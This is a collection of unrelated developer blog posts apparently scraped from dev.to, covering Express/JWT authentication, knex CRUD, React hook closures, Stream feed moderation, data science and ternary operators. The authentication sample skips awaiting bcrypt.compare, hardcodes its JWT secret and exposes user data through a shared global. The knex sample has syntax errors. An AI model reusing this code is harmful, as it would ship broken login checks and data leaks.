app.use(bodyParser.json());
app.use((req, res, next) => {
res.setHeader("Access-Control-Allow-Origin", "*");
res.setHeader(
"Access-Control-Allow-Methods",
"OPTIONS, GET, POST, PUT, PATCH, DELETE"
);
res.setHeader("Access-Control-Allow-Headers", "Content-Type, Authorization");
next();
});
app.use("/api/auth/", authRouter);
app.use((error, req, res, next) => {
console.log(error);
const status = error.statusCode || 500;
const message = error.message;
const data = error.data;
res.status(status).json({ message: message, data: data });
});
// connect to db
const MONGOOSE_URI = `mongodb+srv://${process.env.MONGO_USER}:${process.env.MONGO_PASS}@cluster0.4r3gv.mongodb.net/${process.env.MONGO_DB}`;
mongoose
.connect(MONGOOSE_URI)
.then((result) => {
app.listen(process.env.PORT || 8080);
})
.catch((err) => console.log(err));
```
and
`/controllers/authController.js`
```javascript
const bcrypt = require("bcryptjs");
const userModel = require("../models/userModel");
const jwt = require("jsonwebtoken");
exports.postSignin = async (req, res, next) => {
const { fullname, email, password } = req.body;
try {
const exsitUser = await userModel.findOne({ email: email });
if (exsitUser) {
const error = new Error(
"Eamil already exist, please pick another email!"
);
res.status(409).json({
error: "Eamil already exist, please pick another email! ",
});
error.statusCode = 409;
throw error;
}
const hashedPassword = await bcrypt.hash(password, 12);
const user = new userModel({
fullname: fullname,
email: email,
password: hashedPassword,
});
const result = await user.save();
res.status(200).json({
message: "User created",
user: { id: result._id, email: result.email },
});
} catch (err) {
if (!err.statusCode) {
err.statusCode = 500;
}
next(err);
}
};
let loadedUser;
exports.postLogin = async (req, res, next) => {
const { email, password } = req.body;
try {
const user = await userModel.findOne({ email: email });
if (!user) {
const error = new Error("user with this email not found!");
error.statusCode = 401;
throw error;
}
loadedUser = user;
const comparePassword = bcrypt.compare(password, user.password);
if (!comparePassword) {
const error = new Error("password is not match!");
error.statusCode = 401;
throw error;
}
const token = jwt.sign({ email: loadedUser.email }, "expressnuxtsecret", {
expiresIn: "20m", // it will expire token after 20 minutes and if the user then refresh the page will log out
});
res.status(200).json({ token: token });
} catch (err) {
if (!err.statusCode) {
err.statusCode = 500;
}
next(err);
}
};
exports.getUser = (req, res, next) => { // this function will send user data to the front-end as I said above authFetch on the user object in nuxt.config.js will send a request and it will execute
res.status(200).json({
user: {
id: loadedUser._id,
fullname: loadedUser.fullname,
email: loadedUser.email,
},
});
};
```
and
`/middleware/isAuth.js`
```javascript
const jwt = require("jsonwebtoken");
module.exports = (req, res, next) => {
const authHeader = req.get("Authorization");
if (!authHeader) {
const error = new Error("Not authenticated.");
error.statusCode = 401;
throw error;
}
const token = authHeader.split(" ")[1];
let decodedToken;
try {
decodedToken = jwt.verify(token, "expressnuxtsecret");
} catch (err) {
err.statusCode = 500;
throw err;
}
if (!decodedToken) {
const error = new Error("Not authenticated.");
error.statusCode = 401;
throw error;
}
req.userId = decodedToken.userId;
next();
};
```
and
`/models/userModel.js`
```javascript
const express = require("express");
const mongoose = require("mongoose");
const Schema = mongoose.Schema;
const UserSchema = new Schema(
{
fullname: {
type: String,
required: true,
},
email: {
type: String,
required: true,
},
password: {
type: String,
required: true,
},
},
{ timestamps: true }
);
module.exports = mongoose.model("User", UserSchema);
```
and
`/routes/routes.js`
```javascript
const express = require("express");
const router = express.Router();
const authController = require("../controllers/authController");
router.post("/signin", authController.postSignin);
router.post("/login", authController.postLogin);
router.get("/user", authController.getUser);
module.exports = router;
```
#### Note that this was a test project and typically you have to add some validation for client-side app inputs, and also server-side app
finally it's done, hope you've enjoyed it, and there is my [Github](https://github.com/mohammadali0120/nuxt-express-authentication/) link that you can find the source code
**Some suggestions that might be useful for you:**
For those people, that want to have both (refresh token and access token) for their application and also want to use Postgresql instead of MongoDB, I suggest **[this](https://github.com/mohammadali0120/nuxt-express-postgres-authentication)** GitHub repository.
And for those people, that want to have both (refresh token and access token) for their application and also want to use Postgresql instead of MongoDB and also use Typescript for their Back-end application, I suggest **[this](https://github.com/mohammadali0120/nuxt-express-and-typescript-postgres-authentication)** GitHub repository
| mohammadali0120 |
754,929 | Anyone on polywork out here? | Is anyone out here on @polywork ? Polywork is an alternative to LinkedIn and honestly their... | 0 | 2021-07-09T18:13:18 | https://dev.to/mediocredevops/anyone-on-polywork-out-here-5hem | Is anyone out here on @Polywork?
Polywork is an alternative to LinkedIn and honestly their interface and UI/UX is pretty good!
My Profile is at https://www.polywork.com/afrocoder
I want to connect with new people and network and I have 10 Invite codes if anyone wants to join!
Happy weekend! | mediocredevops | |
755,393 | CRUD operation with knex & mysql in node.js | In this post I will teach you how to use mysql with knex.js 😊 Knex.js is a SQL query... | 0 | 2021-07-10T09:16:48 | https://dev.to/moniruzzamansaikat/crud-operation-with-knex-mysql-in-node-js-2c29 | node, mysql, knex, crud | ### In this post I will teach you how to use mysql with knex.js 😊###
Knex.js is a SQL query builder for Postgres, MSSQL, MySQL, MariaDB, SQLite3, Oracle, and Amazon Redshift designed to be flexible, portable, and fun to use. It features both traditional node style callbacks as well as a promise interface for cleaner async flow control, a stream interface, full-featured query and schema builders, transaction support (with savepoints), connection pooling and standardized responses between different query clients and dialects.
#### Create a project ####
Create a folder then enter to it and then type the command bellow:
```shell
npm init -y
npm i express knex mysql
```
Create a file call `app.js` in your project root and write these codes bellow:
```javascript
const express = require('express')
const app = express()
app.get('/', (req, res) => {
res.send('app running')
})
app.listen(5000, () => {
console.log('Server running on http://localhost:50000');
})
```
Now, create a file for database called `db.js` and add these codes bellow. You need to replace the user(if any, by default it's root), password (default: empty string), database name.
```javascript
const knex = require("knex");
const db = knex({
client: "mysql",
connection: {
host: "localhost",
user: "root",
password: "",
database: "databasename",
},
});
module.exports = db;
```
Now in your database called(databasename, you might replace it) create a table called users. You can create the table by running these command:
```sql
CREATE TABLE users (
id INT NOT NULL AUTO_INCREMENT,
name VARCHAR(255),
isAdmin TINYINT DEFAULT 0,
PRIMARY KEY(id)
);
```
Ok, everything is done 😀. Now it's time to give some shots 🦵. First of all import db from our `db.js` file.
So, let's create a user from our app. For this make a route called '/users/create' bellow our index route. When you will visit the link http://localhost:5000/users/create it will create insert a user to our users table in the database.
### Create ###
```javascript
const db = require('./db.js');
app.get('/users/create', async (req, res) => {
const userId = await db('users').insert({
name: "John Doe"
})
res.json({
message: "User created",
userId
})
})
```
### Read ###
```javascript
app.get('/users', async (req, res) => {
let users = await db('users').select()
users = users.map(user => ({...user});
res.json({
users
})
})
```
### Update ###
```javascript
app.get('/users/:id', async (req, res) => {
const { id } = req.params;
await db('users')
.where('id', id)
.update({
name: "Saikat"
});
res.send('User updated');
})
```
### Delete ###
```javascript
app.get('/users/delete/:id', async (req, res) => {
const { id } = req.params;
await db('users').where('id', id').del();
res.send('User deleted');
})
```
### Here is the full version ###
```javascript
const express = require('express')
const app = express()
app.get('/', (req, res) => {
res.send('app running')
})
// Create a user
app.get('/users/create', async (req, res) => {
const userId = await db('users').insert({
name: "John Doe"
})
res.json({
message: "User created",
userId
})
})
// Query all users
app.get('/users', async (req, res) => {
let users = await db('users').select()
users = users.map(user => ({...user}); // it's needed bcz it return something called RawDataPacket
res.json({
users
})
})
// Update user
app.get('/users/:id', async (req, res) => {
const { id } = req.params;
await db('users')
.where('id', id)
.update({
name: "Saikat"
});
res.send('User updated');
}
// Delete a user
app.get('/users/delete/:id', async (req, res) => {
const { id } = req.params;
await db('users').where('id', id').del();
res.send('User deleted');
})
app.listen(5000, () => {
console.log('Server running on http://localhost:50000');
})
``` | moniruzzamansaikat |
755,507 | React Hooks Dependencies and Stale Closures | After we got the confidence on the flow of hooks in React, it's important to understand about it's... | 0 | 2021-07-10T13:10:19 | https://www.bharathikannan.com/blog/react-hooks-dependencies-and-stale-closures | react, beginners, javascript, hooks | After we got the confidence on the [flow of hooks](https://dev.to/payapula/react-useeffect-hook-flow-2f7p) in React, it's important to understand about it's dependencies as well.
In this post we will dive a bit deeper into the dependency array of hooks.
As always, let's start with a Javascript example. Before looking at the output, try to guess what would be logged.
```javascript
function App(count) {
console.log('Counter initialized with ' + count);
return function print() {
console.log(++count);
};
}
let print = App(1);
print();
print();
print();
print = App(5);
print();
print();
```
The above function is a simple example of **closure** in JavaScript. The console output is as below.
```
Counter initialized with 1
2
3
4
Counter initialized with 5
6
7
```
If you can get it, then great! I will go ahead and explain what is happening.
The `App` function returns another function called `print` this makes our `App`, a higher order function.
> Any function that returns another function or that takes a function as argument is called as Higher order function.
```javascript
function App(count) {
console.log('Counter initialized with ' + count);
return function print() {
console.log(++count);
};
}
```
The retuned function `print` _closes over_ the variable `count` which is from its outer scope. This closing is referred to as **closure**.
Please don't get confused with the name of the functions. Names need not necessarily be identical, as for an example
```javascript
function App(count) {
console.log('Counter initialized with ' + count);
return function increment() {
console.log(++count);
};
}
let someRandomName = App(1);
someRandomName(); //logs 2
```
Here App is returning a function `increment` and we are assigning it to the variable `someRandomName`
To define a "Closure",
> A closure is the combination of a function bundled together (enclosed) with references to its surrounding state (the lexical environment). In other words, a closure gives you access to an outer function’s scope from an inner function. ~ [MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Closures)
Ah? that doesn't look like simple definition right ?
Alright, MDN is not much helpful here let us see what W3Schools says
> A closure is a function having access to the parent scope, even after the parent function has closed. ~ [W3Schools](https://www.w3schools.com/js/js_function_closures.asp)
When we call the `App` function, we get the `print` function in return.
```javascript
let print = App(1);
```
The `App` function gets count as 1 and returns `print` which simply increases the count and logs it. So each time when `print` is called, the count is incremented and printed.
_If we are writing logic that uses closures and not careful enough, then we may fall into a pitfall called...._
## Stale Closures
To understand what is stale closures, let us take our same example and modify it further.
Take a look at this code and guess what would be getting logged into the console.
```javascript
function App() {
let count = 0;
function increment() {
count = count + 1;
}
let message = `Count is ${count}`;
function log() {
console.log(message);
}
return [increment, log];
}
let [increment, log] = App();
increment();
increment();
increment();
log();
```
To break it down,
1. There are two variables `count` and `message` in our App.
2. We are returning two functions `increment` and `log`.
3. As per the name, `increment` increases our `count` and `log` simply logs the `message`.
Try to guess the output. Let me give you some space to think.
.
.
.
.
.
.
.
.
Warning! 🚨 Spoilers 🚨 ahead
.
.
.
.
.
.
.
.
The output is
```bash
Count is 0
```
Oh, did we fail to increment the count?
Let's find out by placing console log inside our `increment` function
```javascript
function App() {
let count = 0;
function increment() {
count = count + 1;
console.log(count);
}
let message = `Count is ${count}`;
function log() {
console.log(message);
}
return [increment, log];
}
let [increment, log] = App();
increment();
increment();
increment();
log();
```
And this time, the output will be
```bash
1
2
3
Count is 0
```
Yes, we are incrementing the `count` that is present in the lexical scope of `increment`. However, the problem is with the `message` and `log`.
Our `log` function _captured_ the `message` variable and kept it. So, when we increment the count, the `message` is not updated and our `log` returns the message "Count is 0".
To fix this stale closure, we can move the message inside of `log`
```javascript
function App() {
let count = 0;
function increment() {
count = count + 1;
console.log(count);
}
function log() {
let message = `Count is ${count}`;
console.log(message);
}
return [increment, log];
}
let [increment, log] = App();
increment();
increment();
increment();
log();
```
And executing would produce the result,
```
1
2
3
Count is 3
```
As per the name, _stale closure_ is when we fail to capture updated value from the outer scope, and getting the _staled_ value.
Hmm.. So, what does this _stale closure_ has to do in React?
## Hooks are nothing but Closures!
Let us bring the same JS example we saw above, into the react world,
```jsx
function App() {
const [count, setCount] = React.useState(0);
let message = `Count is ${count}`;
React.useEffect(() => {
if (count === 3) {
console.log(message);
}
}, []);
return (
<div className="App">
<h1>{count}</h1>
<button
onClick={() => {
setCount((c) => c + 1);
}}
>
Increment
</button>
</div>
);
}
```
After hitting `Increment` button three times, we should have a log that says "Count is 3".
Sadly we don't event get anything logged !!!
This is however not exact replica of our example from our JS world, the key difference is in our React world, `message` does get updated, but our `useEffect` just failed to capture the updated message.
To fix this stale closure problem, we need to specify both `count` and `message` as our dependency array.
```jsx
function App() {
const [count, setCount] = React.useState(0);
let message = `Count is ${count}`;
React.useEffect(() => {
if (count === 3) {
console.log(message);
}
}, [count, message]);
return (
<div className="App">
<h1>{count}</h1>
<button
onClick={() => {
setCount((c) => c + 1);
}}
>
Increment
</button>
</div>
);
}
```
Note - This is just a contrived example, You may choose to ignore either of those dependencies as both are related. If `count` is updated, `message` does get updated, so specifying just either of those is fine to get the expected output.
Things are simple with our example, The logic that we wrote inside the hook is not really a side effect, but it will get more and more complicated if we start to write hooks for data fetching logic and other **real side effects**
The one thing that, always we need to make sure is,
> All of our dependencies for hooks must be specified in the dependency array and, we should not [lie to React about dependencies](https://overreacted.io/a-complete-guide-to-useeffect/#dont-lie-to-react-about-dependencies)
As I said, things get really complicated with closures in real-world applications and it is so very easy to miss a dependency in our hooks.
From my experience, if we failed to specify a dependency and if not caught during the testing, later it would eventually cause a bug and in order to fix it we may need to **re-write the entire logic** from scratch !!
This is a big 🚫 NO 🚫 and **MUST BE AVOIDED** at all cost. But how?
## ESLint Plugin React Hooks
In order to make our life simpler, the react team wrote an ESLint Plugin called `eslint-plugin-react-hooks` to capture all possible errors with the usage of hooks.
So when you are all set up with this [eslint plugin react hooks](https://www.npmjs.com/package/eslint-plugin-react-hooks) When you miss a dependency, it would warn you about the possible consequence.
If you are using latest create-react-app then this comes out of the box (`react-scripts` >= 3.0)
As seen below, when we violate the [rules of hooks](https://reactjs.org/docs/hooks-rules.html) we will get a nice warning suggesting that we are probably doing something wrong.

The above image shows the error from ESLint that reads, _React Hook React.useEffect has missing dependencies: 'count' and 'message'. Either include them or remove the dependency array._
It even fixes the dependency problem with just a single click!
Keep in mind that a stale closure problem does not only affect `useEffect`, we would run into the same problem with other hooks as well like `useMemo` and `useCallback`.
The Eslint plugin works with all the React hooks, can also be configured to run on custom hooks. Apart from just alerting with dependency issues, it would also check for all the rules of hooks, So, make good use of it!
Again to enforce,
> 🚫 Don't Lie to React about Dependencies and 🚫 Don't disable this ESLint rule 🤷🏾♂️
---
Big Thanks to:
- [Getting Closure on Hooks by Shawn Wang](https://www.swyx.io/getting-closure-on-hooks/)
- [Be Aware of Stale Closures when Using React Hooks](https://dmitripavlutin.com/react-hooks-stale-closures/)
- [A Complete Guide to useEffect](https://overreacted.io/a-complete-guide-to-useeffect/)
- [5 Tips to Help You Avoid React Hooks Pitfalls](https://kentcdodds.com/blog/react-hooks-pitfalls)
- [Epic React by Kent.C.Dodds](https://epicreact.dev/) | payapula |
755,522 | Reflections on my portfolio | I was recently tasked with the project of making a personal webpage out of HTML and CSS. This is what... | 0 | 2021-07-10T12:52:26 | https://dev.to/elloo/reflections-on-my-portfolio-2gji | beginners, showdev, devjournal, codenewbie | ---
title: Reflections on my portfolio
published: true
description:
tags: beginners, showdev, devjournal, codenewbie
//cover_image: https://direct_url_to_image.jpg
---
I was recently tasked with the project of making a personal webpage out of HTML and CSS. [This](https://elloo.github.io/portfolio-2021/) is what I ended up with. The following is a little commentary on what I learned and what I will continue working on, amongst other things. Oh, and here's the [repo](https://github.com/elloo/portfolio-2021) if you're interested in the code. I might add images to this post later on - just gotta find a place to host them.
## 1) What went well? Key Learning.
The stand-out thing for my webpage is the CSS art. I'm lucky that my name almost sounds like a phrase "Ewe (L)in Loo" so I just went with that. Making the art allowed me to learn a lot about `position: relative` and `position: absolute`. I always tend to forget this though - maybe that's a sign that I need to continually be making CSS art.
The second thing I enjoy about this webpage is the sticky navbar. I feel the use of the border styling on the top and bottom ties together the look of the page while providing functionality. It was the first time I've used `position: sticky` before so it was interesting to see it in action.
## 2) What could have been improved?
I had to make the two two-column sections of the webpage in two different ways. Have I written 'two' enough? When I made the first two-column section, I was still in the frame-of-mind to make CSS art. This resulted in a `position`-based layout. For some reason, this wouldn't work on my portfolio section. I have a feeling it has something to do with the positioning of the other elements. With a time restriction, I had to quickly find a way to get the layout looking the way I wanted. That's where `display: flex` and flexbox came in.
I also wanted to make the back-to-top button sticky at the bottom, however couldn't figure this out. I guess the webpage is pretty short anyways so maybe this would have been redundant.
Lastly, there are some small gaps between the navbar and its borders. I'm not sure why.
## 3) The key take aways.
One of the key take-aways would be not to underestimate how long it will take to code something. You never know when things won't function the way you expect them to so you should always have your priorities straight.
## 4) The process you followed?
I started out by creating the CSS piece that's seen on loading the page. I knew I wanted to have something to make my page stand-out and I had this idea of turning my name into a pun. From there, the order of completion was the about section, footer, and portfolio. All throughout the way, I tried to remember to make frequent commits. I only pushed right before I was going to take a break from coding. It was very satisfying to be able to see my changes live.
Anyways, I hope my little project gave you a bit of a laugh. Let me know if there's anything else you'd like me to talk about or show me your own portfolio in the comments! | elloo |
755,587 | Moderating Actions on Stream's Activity Feeds service | (headline image by Claudio Schwarz) This is for Stream, or getstream.io's Activity... | 0 | 2021-07-11T07:04:26 | https://dev.to/scampiuk/moderating-actions-on-getstream-io-s-activity-feed-1m4 | getstreamio, aws, lambda, compliance |
######(headline image by [Claudio Schwarz](https://unsplash.com/@purzlbaum))
---
> This is for [Stream](https://getstream.io/activity-feeds/), or getstream.io's Activity Feeds service. This block is here so people who are searching for getstream.io can find it! I'm never sure how to referr to the company, as just calling it 'Stream' when discussing it in a development setting gets very confusing :(
---
## INTRO
In this tutorial, we're going to talk about, and solve, a problem with [Stream's Activity Feeds](https://getstream.io/activity-feeds/) product: there's no build-in moderation tools.
Is that a problem? Yes, it really is. Skipping past the problems of the legals of [who is liable](https://www.dlapiper.com/en/japan/insights/publications/2020/12/ipt-news-q4-2020/whos-responsible-for-content-posted-on-the-internet-section-230-explained/) for [content on your platform](https://www.reuters.com/article/us-britain-tech-regulation-idUSKBN2060Q7), there's also compliance for User Generated Content on both [App Store](https://developer.apple.com/app-store/review/guidelines/#user-generated-content) and [Google Play](https://support.google.com/googleplay/android-developer/answer/9878810?hl=en-GB&ref_topic=9877466) to consider.
We're going to look at setting up your Activity Feed Types so we can create a firewall between Activities being added, and those being viewable. We're also going to talk about a way of handing image moderation: AWS's [Rekognition](https://aws.amazon.com/rekognition/) service.
This isn't a tutorial on how to implement this, rather a guide on how to set up your Activity Feed Types so we can add moderation and other automation.
I'll cover the practical 'how-do' in another article (and I'll update this once I've written it!)
## WHAT YOU'LL NEED
* AWS account, and some basic understanding of what SQS is, and what Lambdas are,
* Getstream account, and some knowedge of the Activity Feed service
## AWS REKOGNITION
[AWS Rekognition](https://docs.aws.amazon.com/rekognition/latest/dg/moderation.html) is a machine learning tool that Amazon have trained over billions of images and videos, and we can use that power just by calling a simple API. By using this, we don't have to have people looking at each image manually, and have to deal with all the problems that come with that.
You'll want to be using the '[Detecting Inappropriate Images](https://docs.aws.amazon.com/rekognition/latest/dg/procedure-moderate-images.html)' part.
We need to upload the image to AWS Rekognition (which is built into the AWS SDK), and it will return a series of Labels, along with a Confidence (a number on how sure AWS is that this Label is right). Then we can use those to determine if the images need to be hidden or not.
You can see in the AWS Rekognition documentation the list of Labels you can get back, and from that you can choose what kind of images you do and don't want on your platform.
## STREAM
Getting the Activity Feeds Types right here is the key. We need to create a gap between the Activities created by users, and those activites being seen by other users.
### Common Activity Feed Type setup
Imagine we want a platform where we have content creators and content viewers. You could set it so each Creator has a `timeline` feed, and each Viewer has a `notification` feed that is subscribed to one or many Creator's Timelines.
Something like this:

Any time `creator-0001` publishes to their `timeline` feed, it will appear in the `notification` feed for `viewer-9876`.
You can see here, there is no way we can stop this happening. If `creator-0001` posts something we don't want, we're in trouble.
### Moderation Activity Feed Type setup
The solution is to create some kind of break between Creator publishing something, and the Viewer seeing it before we've had a chance to moderate it.
Stream provide a way of doing this. For each Activity Feed Type you can it up to puiblish the Activity to an SQS queue, so we can grab it from the queue, look at it, then publish it somehow.
Something like this:

This method allows us to _code the link_ between the `unpublished_timeline:creator-0001` and the `published_timeline:creator-0001` feeds, and using AWS Rekognition we can inject image moderation into that step. In fact, with this step, we can do any kind of moderation or action based on the content published we want.
Your Lambda should take the code from the SQS queue (something Stream have [written a tutorial on](https://getstream.io/blog/using-the-stream-real-time-firehose-with-aws-sqs-lambda-and-sns/)), and use the AWS SDK to send the image to Rekogntion. Once you have your Labels back, you can then choose to ''copy'' the activity from one feed to another.
There isn't a way of copying an Activity from one feed to another that I know off, so you have to re-create the Activity on the `published` feed, and remove it from the `unpublished` feed.. if someone from Stream knows a better way to do this, I would appreciate you letting me know.
## CONCLUSION
With this set up, you will be able to perform any kind of moderation you wish on any Action published on your platform. Using Lambdas and SQS means your solution will scale with your demands, and you can use this model to build in any kind of events.
What about using SQS feeds to manage push notifications, or emails to users when content is published? It's also a good way of getting data _out_ of getstream into something you can look at and use without over-consuming your API usage.
I would be super interested in knowing if this solution works for you, or how you have approached this problem! Please reach out on Twitter to [@scampiuk](https://twitter.com/scampiuk) and let me know how it goes.
| scampiuk |
755,659 | Importance of Ds and its purpose | In this article, we will go through the title role that a Data Scientist plays. There is a covering... | 0 | 2021-07-10T16:29:47 | https://dev.to/antony51777843/importance-of-ds-and-its-purpose-3o50 | <p>In this article, we will go through the title role that a Data Scientist plays. There is a covering of mystery surrounding Data Science. While the saying of Data Science has been be sociable for a while, very few people know about the real purpose of being a Data Scientist. </p>
<p>We will go through the various tasks that a Data Scientist must fulfill and understand as to what industries seek from employing Data Scientists. After this, we will look at many types of industries which employ Data Scientists to make better decisions. So, let’s discover the purpose of Data Science. </p>
<h2>Purpose of Data Science?</h2>
<p>The principal purpose of <a href="https://globaltrainingbangalore.com/data-science-with-r-training-in-bangalore/">Data Science</a> is to find designs within data. It uses various statistical techniques to examine and draw insights from the data. From data extraction, internal strife and pre-processing, a Data Scientist must scrutinize the data thoroughly.</p>
<p>Then, he has the duty of making estimates from the data. The goal of a Data Scientist is to derive decisions from the data. Through these decisions, he is able to contribution companies in making smarter business decisions.
We will divide this blog in many sections to understand the role of a Data Scientist in more detail. </p>
<h2>Why Data Matters</h2>
<p>Data is the new electricity. We are alive in the age of the fourth industrial revolution. This is the age of Artificial Intelligence and Big Data. There is a massive data bang that has resulted in the conclusion of new technologies and smarter products.</p>
<p>Around 2.5 Exabyte’s of Data is produced each day. The need for data has risen extremely in the last decade. Many companies have centered their commercial on data. Data has created new segments in the IT industry. However, </p>
• Why do we need Data?
• Why do industries need Data?
• What makes data a precious commodity?
<p>The answer to these questions lies in the way companies have required to convert their products.</p>
<h2>Data Science is a very recent terminology. </h2>
<p>Beforehand Data Science, we had statisticians. These statisticians experienced in qualitative examination of data and companies working them to analyze their overall performance and sales. </p>
<p>With the twitch of a computing process, cloud storage, and analytical tools, the field of computer science merged with statistics. This provided birth to Data Science. </p>
<p>Early data analytics based on measuring and finding solutions to public problems. For example, a survey regarding a number of children in a district would lead to a choice of development of the school in that area. </p>
<p>With the help of computers, the decision-making process has remained simplified. As a result, computers could solve more difficult statistical problems. As Data started to multiply, companies started to realize its value. </p>
<p>Its significance reflected in the many products designed to boost customer experiences. Industries required experts who could tap the potential that data holstered. Data could help them make the right business decisions and maximize their incomes.</p>
<p>Moreover, it gave the business an opportunity to examine and act according to customer behavior based on their purchasing patterns. Data helped businesses boost their revenue model and helped them craft a better quality product for clients.</p>
<p>Data is to goods what electricity is to household gadgets. We necessity data to engineer the products that provide to the users. It is what drives the product and creates it usable. A Data Scientist is comparable a sculptor.</p>
<p>He carves the data to create something meaningful out of it. While it can be a boring task, a Data Scientist needs to have the right expertise to deliver the results.</p>
<h2>Why is Data Science Important? </h2>
<p>Data creates magic. Industries necessity data to help them make cautious decisions. Data Science mixes raw data into meaningful visions. Therefore, manufacturing need data science. A Data Scientist is a wizard who recognizes how to create magical using data. </p>
<p>A skilled Data Scientist will know how to dig out meaningful data with whatever data he comes across. He helps the company in the right course. The company requires sturdy data-driven decisions at which he’s an expert. </p>
<p>The Data Scientist is a skilled in various underlying fields of Statistics and Computer Science. He uses his logical aptitude to solve business problems. </p>
<h2>Learn How to Become a Data Scientist. <h2>
<p>Data Scientist is well experienced with problem-solving and is assigned to find patterns in data. His goal is to recognize redundant examples and draw insights from it. Data Science requires a variety of tools to extract info from the data.
A Data Scientist is in charge for collecting, storing and maintaining the structured and formless form of data. While the role of Data Science emphases on the analysis and management of data, it is dependent on the area that the company is particular in. This requires the Data Scientist to have domain information of that particular industry. </p>
<h2>Purpose of Data Centric Industries </h2>
<p>As talk about above, companies need data. They need it for their data-driven decision replicas and creating better customer skills. In this section, we will explore the specific areas that these industries focus on in order to make smarter data-driven decisions. </p>
<h2>i. Data Science for Better Marketing </h2>
<p>Companies are using Data to examine their marketing strategies and create better advertisements. Many times, industries spend an astral amount on marketing their products. This may at times not income expected results.
Therefore, by learning and analyzing customer feedback, companies are able to create better advertisements. The companies do so by sensibly analyzing customer behavior online. Also, intensive care customer trends helps the company to get better market insights.
Therefore, businesses need Data Scientists to assist them in making strong decisions with regards to marketing movements and advertisements. </p>
<h2>ii. Data Science for Customer Acquisition </h2>
<p>Data Scientists help the company to acquire customers by examining their needs. This allows the companies to tailor products best suited for the requirements of their possible customers. Data holds the key for businesses to understand their clients. Therefore, the purpose of a Data Scientist here is to allow companies to recognize clients and help them deliver the needs of their customers. </p>
<h2>iii.Data Science for Innovation </h2>
Companies create better novelties with an abundance of data. The Data Scientists aid in product invention by analyzing and creating insights within the conventional designs.
They analyze customer reviews and help the businesses craft product that sits perfectly with the reviews and feedback. Using the data from client feedback, companies make decisions and take proper action in the right direction. </p>
<h2>iv. Data Science for Enriching Lives </h2>
<p>Customer data is key to making their lives improved. Healthcare industries use the statistics available to them to assist their customers in their everyday life.
Data Scientists in these type of industries have the purpose of examining the personal data, health history and create products that tackle the problems faced by customers. From the above examples of data-centric companies, it is clear that each company uses data differently. The use of data varies as per company necessities. Therefore, the purpose of Data Scientists hinge on on the interests of the company. </p>
<h2>Other Skills for Data Scientist </h2>
Now, in this blog on the purpose of data science, we will see what other skills a Data Scientist will need. In this section, we will see the sights how a Data Scientists job stretches beyond analyzing and drawing insights from the data.
More than using statistical techniques to draw conclusions, a Data Scientists goal is to connect his results with the company. A Data Scientist need not only be capable in number chomping but should also capable of translating the mathematical jargons for taking proper business decisions.
<h3>For example</h3> – Study a Data Scientist analyzing monthly sales of the company. He uses various statistical tools to analyze and draw deductions from the data. In the end, he obtains results that he needs to part with the company.
The Data Scientist needs to know how to connect results in a very concise and simple manner. The technical results and processes may not be understood by the people handling sales and distribution.
Therefore, a Data Scientist necessity be able to story tell. The storytelling of data will let him to transfer his knowledge across to the management team without any hassle. Therefore, it increases the purpose of a Data Scientist.
Data Science is a collection of management and IT. The purpose of Data Scientist not only incomplete to statistical processing of data but also managing and communicating data to help companies make better decisions.
So, this was all in the resolve of Data Science. Hope you loved our article.
<h2>Summary</h2>
At the end of the article – the drive of Data Science, we conclude that Data Scientists are the backbone of data-intensive companies. The purpose of Data Scientists is to excerpt, pre-process and analyze data.
Through this, companies can make healthier decisions. Various companies have their own requirements and use data for that reason. In the end, the goal of Data Scientist to make businesses produce better.
With the decisions and visions provided, the companies can adopt appropriate strategies and customize themselves for enhanced customer experience.
Still, if you have any questions related to the purpose of Data Science, ask freely finished comments.
| antony51777843 | |
755,957 | User-defined Ternary Operator | Discussion about user-defined ternary operator | 0 | 2021-07-11T04:38:21 | https://dev.to/wongjiahau/user-defined-ternary-operator-453e | programminglanguage, notation, syntax | ---
title: User-defined Ternary Operator
published: true
description: Discussion about user-defined ternary operator
tags: programminglanguage,notation,syntax
//cover_image: https://direct_url_to_image.jpg
---
## Introduction
Ternary operator is a very useful syntactical notation
for condensing meaning. Basically it takes three
arguments, and syntactically speaking it's identifier is
split into two parts.
For example:
1. Javascript conditionals `a ? b : c`
2. Math range check `a < b < c`
3. SQL joins `a JOIN b ON c`
This is similar to why we
prefer **infix binary operators** (IBO), because they can be
chained together easily (or so called
[*associativity*](https://en.wikipedia.org/wiki/Operator_associativity)).
For example, most if not all of us will think that A is easier to read and understand than B:
|A|B|
|--|--|
|`a + b + c` | `(+ (+ a b) c)` |
Because IBO are so important,
most functional programming (FP) languages like Haskell
allow users to define custom IBO.
For example:
```hs
-- pipe forward operator
(|>) :: a -> (a -> b) -> b
a |> f = f a
-- example usage
main = [1, 2, 3]
|> map (+2)
|> filter (>3)
|> print
|> putStrLn -- [4, 5]
```
See more at [Haskell Infix Operator](https://wiki.haskell.org/Infix_operator).
## Emulating with binary operator
However, when it comes to user-defined ternary operator,
none of the programming languages provide the mechanism.
Although ternary operator can be emulated using double
IBO, it is not without its own caveats.
Take [this example](https://wiki.haskell.org/Ternary_operator) from Haskell:
```hs
data Cond a = a :? a
infixl 0 ?
infixl 1 :?
(?) :: Bool -> Cond a -> a
True ? (x :? _) = x
False ? (_ :? y) = y
test = 1 < 2 ? "Yes" :? "No"
```
The caveat of such emulation is that partial usage is
not only syntactically valid, but also
semantically valid.
For example, we can omit that `:?`
part, and the compiler will **not** complain.
```hs
x = 1 < 2 ? "Yes"
```
From the user experience (UX) perspective, this is very bad,
because we intended users to always use `?` together with
`?:`.
## Emulating using mixfix operators
Other than using IBO, we can also emulate ternary operators using mixfix operators.
For example, in [Agda](https://agda.readthedocs.io/en/v2.6.2/language/mixfix-operators.html):
```hs
-- Example function name _if_else_
-- (emulating Python's conditional operator)
_if_else_ : {A : Set} -> Bool -> A -> A -> A
x if true else y = x
x if false else y = y
```
The caveat of such approach is that users will be
required to lookup the syntax before they can even parse
a piece of code that is filled with mixfix operators.
Because, for example, the above `_if_else_` operators can also be defined as:
```hs
if_then_else_ : {A : Set} -> Bool -> A -> A -> A
if x then true else y = x
if x then false else y = y
```
In this case, the user will not be able to parse the following code correctly without knowing the syntax of `if` or/and `else`:
```hs
x = a if b else c -- is this correct?
y = if a then b else c -- or this?
```
## The Question
Due to the aforementioned caveats of emulating ternary
operators, I am on a quest for searching a **mechanism** to allow
user-definer ternary operators that is:
1. Unambiguous (parsable by both machine and human)
2. Universal (can be applied to all kinds of ternary operators)
## Inspiration
I have been contemplating this question for a while, but
still there is no significant progress, until I read the
book [The Relational Model of Database
Management](https://www.amazon.com/Relational-Model-Database-Management-Version/dp/0201141922)
